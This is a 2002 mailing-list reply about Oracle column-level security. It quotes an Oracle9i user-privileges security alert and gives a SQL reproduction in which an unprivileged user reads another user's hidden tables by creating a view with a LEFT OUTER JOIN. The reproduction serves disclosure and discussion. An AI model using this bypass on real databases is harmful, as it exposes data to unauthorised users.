RE: column level security

From: Khedr, Waleed <Waleed.Khedr_at_FMR.COM>
Date: Tue, 23 Apr 2002 06:53:33 -0800

 What about this:

Oracle Announcement:

       Oracle Security Product Management has released new security alerts
       today.

       Please note that you must log into MetaLink at
       http://metalink.oracle.com to review this document. Use MetaLink's
       number.

       USER PRIVILEGES VULNERABILITY IN ORACLE9i DATABASE SERVER
       Document Identification Number 185074.1

       Thank you for using MetaLink.
       Oracle Support Services

  The following is an example of the error:

       connect  system/****@database <mailto:system/****@database>
       CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY

       TABLESPACE temp;
       CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY

       TABLESPACE temp;
       Grant Create  Session To us1;
       Grant Create  Session To us2;
       Grant Create Table To us1;
       grant unlimited tablespace to us1;
       Grant Create View To us2;

       Connect us1/us11_at_database <mailto:us1/us11_at_database>;
       Create Table t1(c1 Number(1));
       Insert Into t1(c1) Values(9);
       Create Table t2(c1 Number(1));
       Insert Into t2(c1) Values(9);

       commit;
       Connect us2/us11_at_database <mailto:us2/us11_at_database>;

       SQL> Select * From us1.t1;
       ORA-00942: table or view does not exist
       -- this is expected

       SQL> Select * From us1.t2;
       ORA-00942: table or view does not exist
       -- this one too

       SQL> Create View aa As Select * From us1.t1;
       ORA-00942: table or view does not exist
       -- and this one

       SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1

View created -- now this one is NOT !!!!! SQL> select * from aa; T1_C1 T2_C1 ---- ---- 9 9 This effectively means that LEFT OUTER JOIN allows to create views on tables that are normally not visible (provided that unprivileged user knows table and column names).

Author: Khedr, Waleed
  INET: Waleed.Khedr_at_FMR.COM